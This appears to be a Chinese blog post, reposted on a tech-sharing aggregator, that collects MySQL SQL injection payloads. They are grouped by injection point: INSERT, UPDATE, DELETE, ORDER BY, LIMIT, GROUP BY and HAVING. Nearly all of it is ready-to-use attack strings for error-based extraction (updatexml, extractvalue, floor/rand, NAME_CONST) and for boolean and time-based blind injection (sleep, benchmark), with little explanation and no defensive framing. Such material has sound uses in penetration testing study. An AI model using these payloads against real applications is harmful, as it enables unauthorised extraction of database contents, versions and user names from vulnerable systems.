标签:Insert Group name Update version concat test id select
Insert:
语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)
报错注入:
insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');
insert into test(id,name,pass) values (6,'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');
盲注:
//根据or之间的表达式是否成立来进行盲注
'or 1=1 or ' //插入的测试语句直接当成sql语句执行,并把存储返回值,表达式成立,返回结果为1
'or 1=2 or ' //表达式不成立,返回结果为0
' or exists(select * from information_schema.tables) or' //返回结果为1
aaa' or length(database())=11 or '//返回正确
aaa' or mid(database(),1,1)='t' or'//返回正确
aaa' or mid(database(),1,11)='test' or '//返回正确
insert into test(id,name,pass) values (2,'mis1',''or ascii(mid(database(),1,1))=116 or'')
时间盲注:
insert into test(id,name,pass) values (2,'mis1',''or if(mid(database(),1,1)='a',sleep(10),0) or'')
Update:
update test set pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or''WHERE id=2 and name='0';
update test set pass='baidu' or extractvalue(1,concat(0x7e,database())) or''WHERE id=2 and name='0';
Delete:
DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or'';
DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or'';
Order by:
order by [id]---【注入点】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
order by [id] desc/asc ---【注入点】
1 |
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
|
Limit 0,1:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】
报错注入:
1 2 |
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
|
如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:
1 |
SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE 'w', BENCHMARK(5000000,SHA1(1)),5)))),1);
|
Group by:
group by username --【注入点】
1 |
SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
|
Having :
Having 1=1 --【注入点】
1 |
SELECT username FROM users WHERE isadmin = 0 GROUP BY username having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
|
Mysql报错注入:
1、通过floor报错
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
2、ExtractValue
and extractvalue(1, concat(0x5c,(select user())))
3、UpdateXml
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4、利用NAME_CONST注入
and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
5、join报错注入
mysql> select * from(select * from users a join users b)c;
mysql> select * from(select * from users a join users b using(id))c;
mysql> select * from(select * from users a join users b using(id,name))c;
Mysql盲注:
#select * from test where id =2 and length(version())=6
#select * from test where id =2 and ascii(substring(version(),7,1))>1
#select * from test where id =2 and length(database())=4
#select * from test where id =2 and ascii(mid(database(),4,1))=116
#select * from test where id =2 and (select length(version()))=6
#select * from test where id =2 and (select count(*) from test)=3
Mysql时间盲注:
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)
#select * from test where id =2 and if(substring(user(),1,1)='r',sleep(5),0)
#select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)
标签:Insert,Group,name,Update,version,concat,test,id,select 来源: https://www.cnblogs.com/zzhoo/p/15398914.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。